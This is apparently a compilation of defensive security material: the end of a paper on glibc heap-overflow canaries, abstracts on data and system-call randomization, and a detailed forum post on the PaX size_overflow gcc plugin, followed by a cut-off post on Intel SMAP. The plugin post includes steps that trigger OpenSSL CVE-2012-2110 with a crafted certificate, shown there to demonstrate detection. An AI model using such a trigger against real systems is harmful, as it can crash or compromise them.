Table 3: OSDB benchmark.

Installation

Several methods of deploying our heap protection system have been developed, in order to accommodate various system environments and levels of desired protection. Many important security mechanisms are not applied in practice because of the complexity and effort required during setup. We therefore provide different avenues that range from the installation of a pre-compiled package (with minimal effort) to a complete source rebuild of glibc.

One method is to download and install our library modifications as a source patch against glibc. Administrators can select the version appropriate to their system and apply it against a pristine glibc source tree before proceeding with the usual glibc source installation procedure. Source-based distributions, such as Gentoo Linux, can also easily incorporate these patches into their packaging system.
A second method of deployment is to create packages for various distributions of Linux that replace the system glibc image with a version containing our modifications (such as RedHat RPMs). The advantage of this approach is that virtually all applications on the target machine will automatically be protected against heap overflow exploitation, with the exception of those applications that are statically linked against glibc or perform their own memory management. A possible disadvantage is that these applications will also experience some level of performance degradation, which could be prohibitive in some high-performance environments.

A third method of deploying our heap protection system uses packages that install a protected glibc image alongside the existing image, instead of replacing the system's glibc image altogether. A script is provided that utilizes the system loader's LD_PRELOAD functionality to substitute the protected glibc image for the system image for an individual application. This allows an administrator to selectively enable protection only for certain applications (e.g., an administrator may not feel it necessary to protect applications which cannot be executed remotely, and therefore may wish to only protect those applications which are network-accessible). This is also a suitable path for administrators who are wary of potentially destabilizing their entire system by performing a system-wide deployment of a heap modification which has not undergone the extensive real-world testing that standalone dlmalloc has.

All of the described installation methods are documented in detail on our website, located at http://www.cs.ucsb.edu/~rsg/heap/. Packages for various popular distributions and source patches can be downloaded there as well.

Conclusions

This paper presents a technique for detecting heap-based overflows that tamper with in-band memory management data structures.
We discuss different ways to mount such attacks and show how our mechanism detects and prevents them. We implemented a patch for glibc 2.3 that extends the utilized data structures with a canary that stores a checksum over the sensitive data. This checksum calculation involves a secret seed that makes it infeasible for an intruder to guess or fake the canary in an attack.

Experience shows that system administrators are often reluctant to adopt security measures in the systems they administer. Installing new tools may require significant effort to understand how to best apply the technology in the administrator's network, as well as investment in training end users. Additionally, applying a new tool may interfere with existing critical systems or impose unacceptable run-time overhead. This paper introduces a heap protection mechanism that increases application security in a way that is nearly transparent to the functioning of applications and is invisible to users. Applying the system to existing installations has few drawbacks: recompilation of applications is rarely required, and the system imposes minimal overhead on application performance.

Acknowledgments

This research was supported by the Army Research Office, under agreement DAAD19-01-1-0484. The U.S. Government is authorized to reproduce and distribute reprints for Governmental purposes notwithstanding any copyright annotation thereon. The views and conclusions contained herein are those of the authors and should not be interpreted as necessarily representing the official policies or endorsements, either expressed or implied, of the Army Research Office or the U.S. Government.

Author Information

Christopher Kruegel is working as a research postgraduate in the Reliable Software Group at the University of California, Santa Barbara. Previously, he was an assistant professor in the Distributed Systems Group at the Technical University Vienna. Kruegel holds the M.S. and Ph.D.
degrees in computer science from the Technical University Vienna. His research focus is on network security, with an emphasis on intrusion detection. You can contact him at chris@cs.ucsb.edu.

Darren Mutz is a doctoral student in the Computer Science department at the University of California, Santa Barbara. His research interests are in network security and intrusion detection. From 1997 to 2001 he was employed as a member of technical staff in the Planning and Scheduling Group at the Jet Propulsion Laboratory, where he engaged in research efforts focused on applying AI, machine learning, and optimization methodologies to problems in space exploration. He holds a B.S. degree in Computer Science from UCSB and can be contacted at dhm@cs.ucsb.edu.

William Robertson is a first-year PhD student in the Computer Science department at the University of California, Santa Barbara. His research interests include intrusion detection, hardening of computer systems, and routing security. He received his B.S. degree in Computer Science from UC Santa Barbara, and can be reached electronically at wkr@cs.ucsb.edu.

Fredrik Valeur is currently a Ph.D. student at UC Santa Barbara. He holds a Sivilingenioer degree in Computer Science from the Norwegian University of Science and Technology. His research interests include intrusion detection, network security and network scanning techniques. He can be contacted at fredrik@cs.ucsb.edu.

References

[1] Spafford, E., "The Internet Worm Program: An Analysis," Computer Communication Review, 1989.
[2] AlephOne, Smashing the Stack for Fun and Profit, http://www.phrack.org/phrack/49/P49-14.
[3] Wilander, J. and M. Kamkar, "Comparison of Publicly Available Tools for Dynamic Buffer Overflow Prevention," 10th Network and Distributed System Security Symposium, 2003.
[4] CERT Advisory CA-2002-11, "Heap Overflow in Cachefs Daemon (cachefsd)."
[5] CERT Advisory CA-2002-33, "Heap Overflow Vulnerability in Microsoft Data Access Components (MDAC)."
[6] Conover, M., w00w00 on Heap Overflows, http://www.w00w00.org/files/articles/heaptut.txt.
[7] anonymous, Once upon a free(), http://www.phrack.org/phrack/57/p57-0x09.
[8] Kaempf, M., Vudo malloc tricks, http://www.phrack.org/phrack/57/p57-0x08.
[9] Designer, Solar, "JPEG COM Marker Processing Vulnerability in Netscape Browsers and Microsoft Products, and a generic heap-based buffer overflow exploitation technique."
[10] The GNU C Library.
[11] Cowan, C., et al., "StackGuard: Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks," 7th USENIX Security Conference, 1998.
[12] Vendicator, Stack Shield Technical Info.
[13] Baratloo, A., N. Singh and T. Tsai, Libsafe: Protecting Critical Elements of Stacks, Avaya Labs.
[14] Baratloo, A., N. Singh and T. Tsai, "Transparent Run-time Defense Against Stack Smashing Attacks," USENIX Annual Technical Conference, 2000.
[15] Designer, Solar, Non-executable Stack Patch, Openwall Project.
[16] RSX: Run-time addressSpace eXtender, http://www.starzetz.com/software/rsx/index.html.
[17] PAX: Non-executable heap-segments, http://pageexec.virtualave.net/index.html.
[18] Valgrind, an open-source memory debugger for x86-GNU/Linux, http://developer.kde.org/~sewardj/index.html.
[19] Electric Fence - Memory Debugger, http://www.gnu.org/directory/devel/debug/ElectricFence.html.
[20] Huang, Y., Protection Against Exploitation of Stack and Heap Overflows, http://members.rogers.com/exurity/pdf/AntiOverflows.pdf.
[21] Necula, George C., Scott McPeak, and Westley Weimer, "CCured: Type-safe Retrofitting of Legacy Code," 29th ACM Symposium on Principles of Programming Languages, 2002.
[22] Dean, D., E. Felten and D. Wallach, "Java Security: From HotJava to Netscape and Beyond," IEEE Symposium on Security and Privacy, 1996.
[23] The Last Stage of Delirium (LSD), Java and Java Virtual Machine Vulnerabilities and their Exploitation Techniques, http://www.lsd-pl.net/java_security.html.
[24] ISO JTC 1/SC 22/WG 14 - C, http://std.dkuug.dk/JTC1/SC22/WG14/index.html.
[25] ISO JTC 1/SC 22/WG 15 - POSIX.
[26] The GNU C Library Manual, http://www.gnu.org/manual/glibc-2.2.5/libc.html.
[27] Lea, D., A Memory Allocator.
[28] Wilson, P., M. Johnstone, M. Neely, and D. Boles, "Dynamic Storage Allocation: A Survey and Critical Review," International Workshop on Memory Management, 1995.
[29] Chiueh, T., and F. Hsu, "RAD: A Compile-time Solution to Buffer Overflow Attacks," 21st Conference on Distributed Computing Systems, 2001.
[30] WU-Ftpd File Globbing Heap Corruption Vulnerability.
[31] Sudo Password Prompt Heap Overflow Vulnerability.
[32] CVS Directory Request Double Free Heap Corruption Vulnerability.
[33] AIM IX Benchmarks, http://www.caldera.com/developers/community/contrib/aim.html.
[34] Mindcraft WebStone - The Benchmark for Web Servers.
[35] OSDB - The Open Source Database Benchmark.

Source: LISA '03
5. Data Randomization

Cristian Cadar, Microsoft Research Cambridge, UK, cristic@stanford.edu
Periklis Akritidis, Microsoft Research Cambridge, UK, pa280@cl.cam.ac.uk
Manuel Costa, Microsoft Research Cambridge, UK, manuelc@microsoft.com
Jean-Phillipe Martin, Microsoft Research Cambridge, UK, jpmartin@microsoft.com
Miguel Castro, Microsoft Research Cambridge, UK, mcastro@microsoft.com

Abstract

Attacks that exploit memory errors are still a serious problem. We present data randomization, a new technique that provides probabilistic protection against these attacks by xoring data with random masks. Data randomization uses static analysis to partition instruction operands into equivalence classes: it places two operands in the same class if they may refer to the same object in an execution that does not violate memory safety. It then assigns a random mask to each class and generates code instrumented to xor data read from or written to memory with the mask of the memory operand's class. Therefore, attacks that violate the results of the static analysis have unpredictable results. We implemented a data randomization prototype that compiles programs without modifications and can prevent many attacks with low overhead. Our prototype prevents all the attacks in our benchmarks while introducing an average runtime overhead of 11% (0% to 27%) and an average space overhead below 1%.

Download: research.microsoft.com/pubs/70626/tr-2008-120.pdf
6. Thwarting Code Injection Attacks with System Service Interface Randomization

Xuxian Jiang (George Mason University), Helen J. Wang (Microsoft Research), Dongyan Xu (Purdue University), Yi-Min Wang (Microsoft Research)
xjiang@ise.gmu.edu, helenw@microsoft.com, ymwang@microsoft.com, dxu@cs.purdue.edu

Abstract

Code injection attacks are a top threat to today's Internet. With zero-day attacks on the rise, randomization techniques have been introduced to diversify software and operating systems of networked hosts so that attacks that succeed on one process or one host cannot succeed on others. The two most notable system-wide randomization techniques are Instruction Set Randomization (ISR) and Address Space Layout Randomization (ASLR). The former randomizes the instruction set for each process, while the latter randomizes the memory address space layout. Both suffer from a number of attacks. In this paper, we advocate and demonstrate that by combining ISR and ASLR effectively, we can offer much more robust protection than each of them individually. However, a trivial combination of both schemes is not sufficient. To this end, we make the key observation that system call instructions matter the most to attackers for code injection. Our system, RandSys, uses system call instruction randomization and the general technique of ASLR, along with a number of new enhancements, to thwart code injection attacks. We have built a prototype for both Linux and Windows platforms. Our experiments show that RandSys can effectively thwart a wide variety of code injection attacks with a small overhead.

Keywords: Internet Security, Code Injection Attack, System Randomization

Download: research.microsoft.com/en-us/um/people/helenw/papers/randSys.pdf
7. Linux Security in 10 years

Brad Spengler / grsecurity

Download: grsecurity.net/spender_summit.pdf
8. The Guaranteed End of Arbitrary Code Execution

Online: http://grsecurity.net/PaX-presentation_files/frame.htm
9. Inside the Size Overflow Plugin

by ephox » Tue Aug 28, 2012 5:30 pm

Hello everyone, my name is Emese (ephox). You may already know me from my previous project, the constify gcc plugin that pipacs took over and put into PaX. http://www.grsecurity.net/~ephox/const_plugin/

This time I would like to introduce a 1-year-old project of mine that entered PaX a few months ago. It's another gcc plugin, called size_overflow, whose purpose is to detect a subset of the integer overflow security bugs at runtime. https://grsecurity.net/~ephox/overflow_plugin/

On integer overflows briefly

In the C language, integer types can represent a finite range of numbers. If the result of an arithmetic operation falls outside of the type's range (e.g., the largest representable value plus one), then the value overflows or underflows. This becomes a problem if the programmer didn't think of it, e.g., the size parameter of a memory allocator function becomes smaller due to the overflow. There is a very good description of integer overflow in Phrack: http://www.phrack.org/issues.html?issue ... 10#article

The history of the plugin

The plugin is based on spender's idea, the intoverflow_t type found in older PaX versions. This was a 64 bit wide integer type on 32 bit archs and a 128 bit wide integer type on 64 bit archs. There were wrapper macros for the important memory allocator functions (e.g., kmalloc) where the value to be put into the size argument (of size_t type) could be checked against overflow. For example:

#define kmalloc(size,flags) \
({ \
    void *buffer = NULL; \
    intoverflow_t overflow_size = (intoverflow_t)size; \
    \
    if (!WARN(overflow_size > ULONG_MAX, "kmalloc size overflow\n")) \
        buffer = kmalloc((size_t)overflow_size, (flags)); \
    buffer; \
})

This solution had a problem in that the size argument is usually the result of a longer computation that consists of several expressions.
The intoverflow_t cast based check could only verify the last expression that was used as the argument to the allocator function, and even then it only helped if the type cast of the leftmost operand affected the other operands as well. Therefore if an integer overflow occurred during the evaluation of the earlier expressions, the remaining computation would use the overflowed value, which the intoverflow_t cast could not detect. Second, only a few basic allocator functions had wrapper macros, because wrapping every function with a size argument would have been a big job and would have resulted in an unmaintainable patch.

In contrast, the size_overflow plugin recomputes all subexpressions of the expression with a double wide integer type in order to detect overflows during the evaluation of the expression.

Internals of the size_overflow plugin

The compilation process is divided into passes; a plugin can insert its own passes between or in place of them. Each pass has a specific task (e.g., optimization, transformation, analysis) and they run in a specific order on a translation unit (some optimization passes may be skipped depending on the optimization level). The plugin's pass (size_overflow_pass) executes after the "ssa" GIMPLE pass, which is among the early GIMPLE passes. It's placed there to allow all the later optimization passes to properly optimize the code modified by the plugin.

Before I describe the plugin in more detail, let's look at some gcc terms. The gimple structure in gcc represents the statements (stmt) of the high level language. For example, this is what a function call (gimple_code: GIMPLE_CALL) looks like:

gimple_call <malloc, D.4425_2, D.4421_15>

or a subtract (gimple_code: GIMPLE_ASSIGN) stmt:

gimple_assign <minus_expr, D.4421_15, D.4464_12, a_5>

This stmt has 3 operands, one lhs (left hand side) and two rhs (right hand side) ones.
Each variable is of type "tree" and has a name (SSA_NAME) and version number (SSA_NAME_VERSION) while we are in SSA (static single assignment) mode. As we can see, the parameter of malloc is the variable D.4421_15 (SSA_NAME: 4421, SSA_NAME_VERSION: 15), which is also the lhs of the assignment, so there is a use-def relation between the two stmts; that is, the defining statement (def_stmt) of the variable D.4421_15 is the D.4421_15 = D.4464_12 - a_5 stmt.

Further reading on SSA and GIMPLE:
SSA - GNU Compiler Collection (GCC) Internals
GIMPLE - GNU Compiler Collection (GCC) Internals

The plugin gets called for each function and goes through its stmts looking for calls to marked functions. In the kernel, functions can be marked in two ways:
- with a function attribute, for functions at the bottom of the function call hierarchy (e.g., copy_user_generic, __copy_from_user, __copy_to_user, __kmalloc, __vmalloc_node_range, vread)
- listed in a hash table (for functions calling the above basic functions)

In userland there is only a hash table (e.g., openssl). The present description covers the kernel.

The attribute

Plugins can define new attributes. This plugin defines a new function attribute which is used to mark the size parameters of interesting functions so that they can be tracked backwards. This is what the attribute looks like:

__attribute__((size_overflow(1)))

where the parameter (1) refers to the function argument (they are numbered from 1) that we want to check for overflow. In the kernel there is a #define for this attribute, similarly to other attributes: __size_overflow(...). For example:

unsigned long __must_check clear_user(void __user *mem, unsigned long len) __size_overflow(2);

static inline void* __size_overflow(1,2) kcalloc(size_t n, size_t size, gfp_t flags)
{
...
}

Further documentation about attributes:
Attributes - GNU Compiler Collection (GCC) Internals

The hash table

Originally we only had the attribute, as with the constify plugin, but in order to reduce the kernel patch size (e.g., in 3.5.1 2920 functions are marked) all functions except for the base ones are stored in a hash table. The hash table is generated by the tools/gcc/generate_size_overflow_hash.sh script from tools/gcc/size_overflow_hash.data into tools/gcc/size_overflow_hash.h.

A hash table entry is described by the size_overflow_hash structure, whose fields are the following:
- next: the hash chain pointer to the next entry
- name: name of the function
- param: an integer with bits set corresponding to the size parameters

For example, this is what the hash entry of the include/linux/slub_def.h:kmalloc function looks like:

struct size_overflow_hash _000008_hash = {
	.next = NULL,
	.name = "kmalloc",
	.param = PARAM1,
};

The hash table is indexed by a hash computed from numbers describing the function declarations (get_tree_code()). Example:

struct size_overflow_hash *size_overflow_hash[65536] = {
	[11268] = &_000008_hash,
};

The hash algorithm is CrapWow: http://www.team5150.com/~andrew/noncryptohashzoo/CrapWow.html

Enabling the size_overflow plugin in the kernel:
- in menuconfig (under PaX): Security options -> PaX -> Miscellaneous hardening features -> Prevent various integer overflows in function size parameters
- .config (under PaX): CONFIG_PAX_SIZE_OVERFLOW
- .config (without PaX): CONFIG_SIZE_OVERFLOW

stmt duplication with double wide integer types

When the plugin finds a marked function, it traces back the use-def chain of the parameter(s) defined by the function attribute. The stmts found recursively are duplicated using variables of double wide integer types. In some cases duplication is not the right strategy.
In these cases the plugin takes the lhs of the original stmt and casts it to the double wide type:
- function calls (GIMPLE_CALL): they cannot be duplicated because they may have side effects. This also means that the current plugin version doesn't check if a function returns an overflowed value, see todo
- inline asm (GIMPLE_ASM): it may have side effects too
- taking the address of an object (ADDR_EXPR): todo
- pointers (MEM_REF, etc.): todo
- division (RDIV_EXPR, etc.): special case for the kernel because it doesn't support division with double wide types
- global variables: todo

If the marked function's parameter can be traced back to a parameter of the caller, the plugin checks whether the caller is already in the hash table (or is marked with the attribute). If it isn't, the plugin prints the following message:

Function %s is missing from the size_overflow hash table +%s+%d+%u+
(caller's name, parameter's number, hash)

If anyone sees this message, please send it to me by e-mail (re.emese@gmail.com) so that I can put the caller into the hash table, otherwise the plugin will not apply the overflow check to it.

Inserting the overflow checks

The plugin inserts overflow checks in the following cases:
- marked function parameters, just before the function call
- stmts with a constant operand, see gcc intentional overflow
- negations (BIT_NOT_EXPR)
- type cast stmts between these types:

---------------------------------
| from | to   | lhs  | rhs |
---------------------------------
| u32  | u32  | -    | !   |
| u32  | s32  | TODO | *!  |
| s32  | u32  | TODO | *!  |
| s32  | s32  | -    | !   |
| u32  | u64  | !    | !   |
| u32  | s64  | TODO | !   |
| s32  | u64  | TODO | !   |
| s32  | s64  | !    | !   |
| u64  | u32  | !    | !   |
| u64  | s32  | TODO | !   |
| s64  | u32  | TODO | !   |
| s64  | s32  | !    | !   |
| u64  | u64  | -    | !   |
| u64  | s64  | TODO | *!  |
| s64  | u64  | TODO | *!  |
| s64  | s64  | -    | !   |
---------------------------------

Legend:
from: source type
to: destination type
lhs: is the lhs checked?
rhs: is the rhs checked?
!: the plugin inserts an overflow check
TODO: would be nice to insert an overflow check, see todo
*!: the plugin inserts an overflow check except when the stmt's def_stmt is a MINUS_EXPR (subtraction)
-: no overflow check is needed

When the plugin finds one of the above cases, it inserts a range check of the double wide variable's value against the original variable type's range (TYPE_MIN, TYPE_MAX). This guarantees that at runtime the value fits into the original variable's type range. If the runtime check detects an overflow, the report_size_overflow function is called instead of executing the following stmt. The marked function's parameter is replaced with a variable cast down from its double wide clone so that gcc can potentially optimize out the stmts computing the original variable.

If we uncomment the print_the_code_insertions function call in the insert_check_size_overflow function, the plugin will print out this message during compilation: "Integer size_overflow check applied here." This message isn't too useful because later passes in gcc will optimize out about 6 out of 10 insertions. If anyone is interested in the insertion count after optimizations, try this command (on the kernel):

objdump -drw vmlinux | grep "call.*report_size_overflow" | wc -l

report_size_overflow

The plugin creates the report_size_overflow declaration in the start_unit_callback, but the definition is always in the current program; the plugin inserts only the report_size_overflow calls. This is a no-return function. It prints out the file name, the function name and the line number of the detected overflow. If the stmt's line number is not available in gcc, it prints out the caller's start line number. The last two strings are only debug information.
The report_size_overflow function's message looks like this (without PaX it uses SIZE_OVERFLOW instead of PAX):

PAX: size overflow detected in function main tests/main12.c:27 cicus.4_21 (max)

In the kernel the report_size_overflow function is in fs/exec.c. The overflow message is sent to dmesg along with a stack backtrace, and then a SIGKILL is sent to the process that triggered the overflow. In openssl the report_size_overflow function is in crypto/mem.c. The overflow message is sent to syslog and the triggering process is sent a SIGSEGV.

Plugin internals through a simple example

The source code (test.c):

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

extern void *malloc(size_t size) __attribute__((size_overflow(1)));

void * __attribute__((size_overflow(1))) coolmalloc(size_t size)
{
	return malloc(size);
}

void report_size_overflow(const char *file, unsigned int line, const char *func, const char *ssa_name)
{
	printf("SIZE_OVERFLOW: size overflow detected in function %s %s:%u %s", func, file, line, ssa_name);
	_exit(1);
}

int main(int argc, char *argv[])
{
	unsigned long a;
	unsigned long b;
	unsigned long c = 10;

	a = strtoul(argv[1], NULL, 0);
	b = strtoul(argv[2], NULL, 0);
	c = c + a * b;
	return printf("%p\n", coolmalloc(c));
}

Compile the plugin:

gcc -I`gcc -print-file-name=plugin`/include/c-family -I`gcc -print-file-name=plugin`/include -fPIC -shared -O2 -o size_overflow_plugin.so size_overflow_plugin.c

Compile test.c with the plugin and dump its ssa representations:

gcc -fplugin=size_overflow_plugin.so test.c -O2 -fdump-tree-all

Each dumpable gcc pass is dumped by -fdump-tree-all. This blog post focuses on the ssa and the size_overflow passes. The marked function is coolmalloc, the traced parameter is c_12.
The main function's ssa representation is below, just before executing the size_overflow pass (test.c.*.ssa*):

main (int argc, char * * argv)
{
  long unsigned int c;
  long unsigned int b;
  long unsigned int a;
  const char * restrict D.3291;
  void * D.3290;
  int D.3289;
  long unsigned int D.3288;
  const char * restrict D.3287;
  char * D.3286;
  char * * D.3285;
  const char * restrict D.3284;
  char * D.3283;
  char * * D.3282;

<bb 2>:
  c_1 = 10;
  D.3282_3 = argv_2(D) + 4;
  D.3283_4 = *D.3282_3;
  D.3284_5 = (const char * restrict) D.3283_4;
  a_6 = strtoul (D.3284_5, 0B, 0);
  D.3285_7 = argv_2(D) + 8;
  D.3286_8 = *D.3285_7;
  D.3287_9 = (const char * restrict) D.3286_8;
  b_10 = strtoul (D.3287_9, 0B, 0);
  D.3288_11 = a_6 * b_10;
  c_12 = D.3288_11 + c_1;
  D.3290_13 = coolmalloc (c_12);
  D.3291_14 = (const char * restrict) &"%p\n"[0];
  D.3289_15 = printf (D.3291_14, D.3290_13);
  return D.3289_15;
}

After the size_overflow pass on a 32 bit arch (test.c.*size_overflow*):

main (int argc, char * * argv)
{
  long unsigned int cicus.7;
  long long unsigned int cicus.6;
  long long unsigned int cicus.5;
  long long unsigned int cicus.4;
  long long unsigned int cicus.3;
  long long unsigned int cicus.2;
  long unsigned int c;
  long unsigned int b;
  long unsigned int a;
  const char * restrict D.3291;
  void * D.3290;
  int D.3289;
  long unsigned int D.3288;
  const char * restrict D.3287;
  char * D.3286;
  char * * D.3285;
  const char * restrict D.3284;
  char * D.3283;
  char * * D.3282;

<bb 2>:
  c_1 = 10;
  cicus.5_24 = (long long unsigned int) c_1;
  D.3282_3 = argv_2(D) + 4;
  D.3283_4 = *D.3282_3;
  D.3284_5 = (const char * restrict) D.3283_4;
  a_6 = strtoul (D.3284_5, 0B, 0);
  cicus.2_21 = (long long unsigned int) a_6;
  D.3285_7 = argv_2(D) + 8;
  D.3286_8 = *D.3285_7;
  D.3287_9 = (const char * restrict) D.3286_8;
  b_10 = strtoul (D.3287_9, 0B, 0);
  cicus.3_22 = (long long unsigned int) b_10;
  D.3288_11 = a_6 * b_10;
  cicus.4_23 = cicus.2_21 * cicus.3_22;
  c_12 = D.3288_11 + c_1;
  cicus.6_25 = cicus.4_23 + cicus.5_24;
  cicus.7_26 = (long unsigned int) cicus.6_25;
  if (cicus.6_25 > 4294967295)
    goto <bb 3>;
  else
    goto <bb 4>;

<bb 3>:
  report_size_overflow ("test.c", 28, "main", "cicus.6_25 (max)\n");

<bb 4>:
  D.3290_13 = coolmalloc (cicus.7_26);
  D.3291_14 = (const char * restrict) &"%p\n"[0];
  D.3289_15 = printf (D.3291_14, D.3290_13);
  return D.3289_15;
}

Some problems encountered during development

gcc intentional overflow: gcc can produce unsigned overflows while transforming expressions, e.g., it can transform constants in a way that produces the correct result through unsigned overflow on the given type (e.g., a-1 -> a+4294967295). The plugin used to detect this (false positive) overflow at runtime. The solution is to not duplicate such stmts that contain constants. Instead, the plugin inserts an overflow check for the non-constant rhs before that stmt and uses its lhs (cast to the double wide type) in the later duplication. For example on 32 bit, for coolmalloc(a * b - 1 + argc):

before the size_overflow plugin:

...
D.4416_10 = a_5 * b_9;
D.4418_13 = D.4416_10 + argc.0_12;
D.4419_14 = D.4418_13 + 4294967295;
D.4420_15 = coolmalloc (D.4419_14);
...

after the size_overflow plugin:

...
D.4416_10 = a_5 * b_9;
cicus.7_25 = cicus.4_22 * cicus.6_24;
D.4418_13 = D.4416_10 + argc.0_12;
cicus.9_27 = cicus.7_25 + cicus.8_26;
cicus.10_28 = (unsigned int) cicus.9_27;
cicus.11_29 = (long long unsigned int) cicus.9_27;
if (cicus.11_29 > 4294967295)
  goto <bb 3>;
else
  goto <bb 4>;

<bb 3>:
report_size_overflow ("test.c", 28, "main");

<bb 4>:
D.4419_14 = cicus.10_28 + 4294967295;
cicus.12_30 = (long long int) D.4419_14;
...

when a size parameter is used for more than one purpose (not just for size): the plugin cannot recognize this case. When I get a false positive report, I remove the function from the hash table.

type casts from gcc or the programmer causing intentional overflows: this is the reason for the TODOs in the table above.

Detecting a real security issue

I'll demonstrate the plugin on an openssl 1.0.0 bug (CVE-2012-2110).
To reproduce the overflow, use this test case: http://lock.cmpxchg8b.com/openssl-1.0.1-testcase-32bit.crt.gz

Download the plugin source (or use the ebuild) from here: https://grsecurity.net/~ephox/overflow_plugin/

Download the openssl patch (that contains the report_size_overflow function): http://grsecurity.net/~ephox/overflow_plugin/userland_patches/openssl-1.0.0/

Compile openssl with the plugin (see the README); after that we can reproduce the bug:

openssl-1.0.0.h/bin $ ./openssl version
OpenSSL 1.0.0h 12 Mar 2012
openssl-1.0.0.h/bin $ ./openssl x509 -in ../../openssl-1.0.1-testcase-32bit.crt -text -noout -inform DER
Segmentation fault

In syslog there is the plugin's message:

SIZE_OVERFLOW: size overflow detected in function asn1_d2i_read_bio a_d2i_fp.c:228 cicus.69_205 (max)

I'll have more (gentoo) ebuilds if anyone wants to use the plugin in userland (for now only openssl): http://grsecurity.net/~ephox/overflow_plugin/gentoo/

Performance impact

hardware: quad core sandy bridge
kernel version: 3.5.1
patch: pax-linux-3.5.1-test16.patch
overflow checks after optimization (gcc-4.7.1): 931

With the size_overflow plugin disabled:

Performance counter stats for 'du -s /test' (10 runs):

4345.283145 task-clock # 0.983 CPUs utilized ( +- 0.12% )
1,107 context-switches # 0.255 K/sec ( +- 0.09% )
0 CPU-migrations # 0.000 K/sec ( +- 100.00% )
3,763 page-faults # 0.866 K/sec ( +- 0.13% )
14,641,126,270 cycles # 3.369 GHz ( +- 0.03% )
4,228,389,062 stalled-cycles-frontend # 28.88% frontend cycles idle ( +- 0.06% )
1,962,172,809 stalled-cycles-backend # 13.40% backend cycles idle ( +- 0.23% )
25,463,911,605 instructions # 1.74 insns per cycle # 0.17 stalled cycles per insn ( +- 0.01% )
6,968,592,408 branches # 1603.714 M/sec ( +- 0.01% )
47,230,732 branch-misses # 0.68% of all branches ( +- 0.07% )

4.419888484 seconds time elapsed ( +- 0.12% )

With the size_overflow plugin enabled:

Performance counter stats for 'du -s /test' (10 runs):

4291.088943 task-clock # 0.983 CPUs utilized ( +- 0.08% )
1,093 context-switches # 0.255 K/sec ( +- 0.08% )
0 CPU-migrations # 0.000 K/sec
3,761 page-faults # 0.877 K/sec ( +- 0.15% )
14,481,436,247 cycles # 3.375 GHz ( +- 0.05% )
4,155,959,526 stalled-cycles-frontend # 28.70% frontend cycles idle ( +- 0.15% )
2,003,994,250 stalled-cycles-backend # 13.84% backend cycles idle ( +- 0.54% )
25,436,031,783 instructions # 1.76 insns per cycle # 0.16 stalled cycles per insn ( +- 0.00% )
6,960,975,325 branches # 1622.193 M/sec ( +- 0.00% )
47,125,984 branch-misses # 0.68% of all branches ( +- 0.07% )

4.365185965 seconds time elapsed ( +- 0.08% )

TODO: I don't know why it was faster with the plugin on these tests.

During compilation it didn't cause too much slowdown (0.077s only).

Allyes kernel config statistics after optimization (number of calls to report_size_overflow, gcc-4.6.2):

3.5.0:
vmlinux_4.6.x_i386-yes: 2556
vmlinux_4.6.x_x86_64-yes: 2659

3.2.26:
vmlinux_4.6.x_i386-yes: 2657
vmlinux_4.6.x_x86_64-yes: 2756

2.6.32.59:
vmlinux_4.6.x_i386-yes: 1893
vmlinux_4.6.x_x86_64-yes: 2353

Future plans

- enable the plugin to compile c++ sources
- compile the following programs with the plugin:
  - glibc: I tried to compile it already but the make system doesn't like my report_size_overflow function, so I'll try it later
  - glib
  - syslog-ng: I don't yet know where to report the overflow message (chicken and egg problem)
  - firefox
  - chromium
  - samba
  - apache
  - php
  - the Android kernel
  - anything with an integer overflow CVE
- plugin internals plans:
  - print out the overflowed value in the report message
  - comments
  - optimization: use unlikely/__builtin_expect for the inserted checks
  - if the expression can be tracked back to the result of a function call then the function's return value should be tracked back as well
  - handle ADDR_EXPR
  - make use of LTO (gcc 4.7+): could get rid of the hash table
  - llvm size_overflow plugin
  - an IPA pass to be able to track back across static functions in a translation unit; it would reduce the hash table
  - handle function pointers
  - handle struct fields
  - fix this side effect: warning: call to 'copy_to_user_overflow' declared with attribute warning: copy_to_user() buffer size is not provably correct
  - solve all the TODO items in the cast handling table

If anyone's interested in compiling other userland programs with the plugin, please send the hash table and the patch to me.

Sursa: grsecurity forums • View topic - Inside the Size Overflow Plugin
  10. Supervisor Mode Access Prevention

by PaX Team » Fri Sep 07, 2012 9:05 pm

With the latest release of their Architecture Instruction Set Extensions Programming Reference, Intel has finally lifted the veil on a new CPU feature to debut in next year's Haswell line of processors. This new feature is called Supervisor Mode Access Prevention (SMAP), and there's a reason why its name so closely resembles Supervisor Mode Execution Prevention (SMEP), the feature that debuted with Ivy Bridge processors a few months ago. While the purpose of SMEP was to control instruction fetches and code execution from supervisor mode (traditionally used by the kernel component of operating systems), SMAP is concerned with data accesses from supervisor mode. In particular, SMEP, when enabled, prevents code execution from userland memory pages by the kernel (the favourite exploit technique against kernel security bugs), whereas SMAP will prevent unintended data accesses to userland memory.

The twist in the story, and the reason why these security features couldn't be implemented as one, lies in the fact that the kernel does have a legitimate need to access data in userland memory at times, while no contemporary kernel needs to execute code from there. In other words, while SMEP can be enabled unconditionally by flipping a bit at boot time, SMAP needs more care because it has to be disabled/enabled around legitimate accessor functions in the kernel. Intel has added two new instructions for this very purpose (CLAC/STAC) and repurposed the alignment check status bit in supervisor mode to enable quick switching of SMAP at runtime. This will require more extensive changes in kernel code than SMEP did, but the amount of code is still quite manageable. Third party kernel modules that don't use the kernel's userland accessor functions will have to take care of switching SMAP on/off themselves.

What does SMAP mean for PaX?
The situation is similar to last year's SMEP, which made an efficient implementation of (partial) KERNEXEC possible on amd64 (i386/KERNEXEC continues to rely on segmentation instead, which provides better protection than SMEP can). SMAP's analog feature in PaX is called UDEREF, which so far couldn't be efficiently implemented on amd64 (once again, i386/UDEREF will continue to rely on segmentation to provide better userland/kernel separation than SMAP can). Beyond allowing an efficient implementation of UDEREF, there'll be other uses for SMAP (or perhaps a future variant of it) in PaX: sealed kernel memory whose access is carefully controlled even for kernel code itself.

What does SMAP mean for security?

